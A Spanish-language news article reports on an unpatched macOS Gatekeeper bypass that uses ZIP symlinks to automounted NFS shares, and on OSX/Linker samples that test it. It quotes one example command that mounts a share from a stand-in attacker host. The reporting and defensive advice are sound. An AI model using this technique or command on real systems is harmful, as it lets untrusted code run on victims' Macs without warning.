Los investigadores de seguridad cibernética de Intego están advirtiendo sobre la posible explotación activa de una vulnerabilidad de seguridad sin parche de seguridad de MacOS Gatekeeper de Apple y el PoC, que se dio a conocer públicamente a fines del mes pasado.
La semana pasada, el equipo de Intego descubrió cuatro muestras de nuevo malware de macOS en VirusTotal que aprovechan la vulnerabilidad de omisión de GateKeeper para ejecutar código no confiable en macOS sin mostrar a los usuarios ninguna advertencia o pedir su permiso explícito.
Sin embargo, el malware recién descubierto, denominado OSX / Linker, no se ha visto en estado salvaje hasta el momento y parece estar en desarrollo. A pesar de que las muestras aprovechan el defecto de desvío de Gatekeeper no parcheado, no descargan ninguna aplicación maliciosa del servidor del atacante.
Según Joshua Long, de Intego, hasta la semana pasada, “el fabricante de malware simplemente estaba realizando un reconocimiento de pruebas de detección”.
“Uno de los archivos fue firmado con una ID de desarrollador de Apple (como se explica a continuación), es evidente que las imágenes de disco OSX / Linker son obra de los desarrolladores del adware OSX / Surfbuyer”, dijo Long en una publicación de blog.
Sin embargo, dado que la muestra de malware se vincula a un servidor remoto desde donde descarga la aplicación que no es de confianza, los atacantes también pueden distribuir las mismas muestras al objetivo real simplemente reemplazando la aplicación de muestra definida con una aplicación de malware en su servidor.
Vulnerabilidad de omisión del controlador de acceso a macOS
GateKeeper es una característica de seguridad integrada en Apple macOS que impone la firma del código y verifica las aplicaciones descargadas antes de permitir que se ejecuten, lo que ayuda a los usuarios a proteger sus sistemas contra malware y otros programas maliciosos.
Eso significa que, si descarga una aplicación de Internet, GateKeeper solo permitirá que se ejecute sin ninguna advertencia si se ha firmado con un certificado válido emitido por Apple, de lo contrario le solicitará que permita o deniegue la ejecución.
Sin embargo, Gatekeeper ha sido diseñado para tratar las unidades externas (USB o HDD) y los recursos compartidos de red como “ubicaciones seguras” desde donde los usuarios pueden ejecutar cualquier aplicación sin involucrar las verificaciones y avisos de GateKeeper.
Filippo Cavallarin, un investigador de seguridad independiente, a fines del mes pasado, reveló públicamente una forma de explotar este comportamiento al combinarlo con otras dos características legítimas del sistema operativo macOS, que son:
- Los archivos zip pueden contener enlaces simbólicos que apuntan a una ubicación arbitraria, incluidos los puntos finales de automount.
- La función de montaje automático en macOS puede montar automáticamente un recurso compartido de red desde un servidor remoto simplemente accediendo a él con una ruta “especial”, es decir, que comience con “/ net /”.
“Por ejemplo, ls /net/evil-attacker.com/sharedfolder/ hará que el sistema operativo lea el contenido de la ‘carpeta compartida’ en el host remoto (evil-attacker.com) usando NFS”, explicó Cavallarin en una publicación de blog.
Como se muestra en la demostración en video, Cavallarin creó un archivo ZIP con un enlace simbólico a un recurso compartido de red controlado por un atacante que macOS montará automáticamente.
Una vez que la víctima abre el archivo ZIP y sigue el enlace, navegará a la red compartida controlada por el atacante en la que confía el controlador de acceso, engañando a la víctima para que ejecute archivos ejecutables maliciosos sin ninguna advertencia.
“La forma en que está diseñado el Finder (por ejemplo, las extensiones ocultas .app, ocultar la ruta completa de la barra de título) hace que esta técnica sea muy efectiva y difícil de detectar”, señala el investigador.
Sin embargo, las muestras de malware recién descubiertas no son archivos ZIP, sino archivos de imagen de disco (con .dmg), lo que muestra que “los fabricantes de malware estaban experimentando para ver si la vulnerabilidad de Cavallarin también funcionaría con las imágenes de disco”.
Cavallarin informó responsablemente sus hallazgos a Apple el 22 de febrero, pero decidió hacerlo público a fines del mes pasado luego de que la compañía no pudo solucionar el problema dentro del plazo de 90 días para la divulgación y comenzó a ignorar sus correos electrónicos.
Hasta que Apple solucione este problema, el investigador recomendó a los administradores de red bloquear las comunicaciones de NFS con direcciones IP externas y, para los usuarios domésticos, siempre es importante no abrir archivos adjuntos de correo electrónico de una fuente desconocida, sospechosa o poco confiable.